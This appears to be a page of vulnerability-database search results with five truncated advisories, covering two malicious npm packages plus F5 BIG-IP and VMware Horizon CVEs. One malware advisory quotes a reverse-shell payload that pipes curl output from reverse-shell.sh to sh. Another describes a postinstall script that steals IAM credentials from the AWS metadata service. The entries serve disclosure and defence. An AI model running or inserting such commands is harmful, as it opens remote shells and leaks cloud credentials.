5 matches found
MAL-2026-6591 Malicious code in ledgerflow-deploy-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5f0097d19be676ac30ff79dffcff38f128873c80115a8a150c3eceff0422aa93 On npm install, the package's postinstall script queries the AWS instance metadata service IMDSv1 at 169.254.169.254 for the attached IAM role and...
Malicious code in internallib_v493 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...
F5 Networks BIG-IP : BIG-IP APM Portal Access vulnerability (K73183618)
The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.2 / 12.1.5.2 / 14.1.2.5 / 15.0.1.3 / 15.1.0.2 / 16.0.0. It is, therefore, affected by a vulnerability as referenced in the K73183618 advisory. InBIG-IP APM Portal Access, HTTP pages that are served by back-end serve...
CVE-2019-5513
VMware Horizon Connection Server 7.x before 7.8, 7.5.x before 7.5.2, 6.x before 6.2.8 contains an information disclosure vulnerability. Successful exploitation of this issue may allow disclosure of internal domain names, the Connection Server’s internal name, or the gateway’s internal IP address...
CVE-2019-5513
VMware Horizon Connection Server 7.x before 7.8, 7.5.x before 7.5.2, 6.x before 6.2.8 contains an information disclosure vulnerability. Successful exploitation of this issue may allow disclosure of internal domain names, the Connection Server’s internal name, or the gateway’s internal IP address...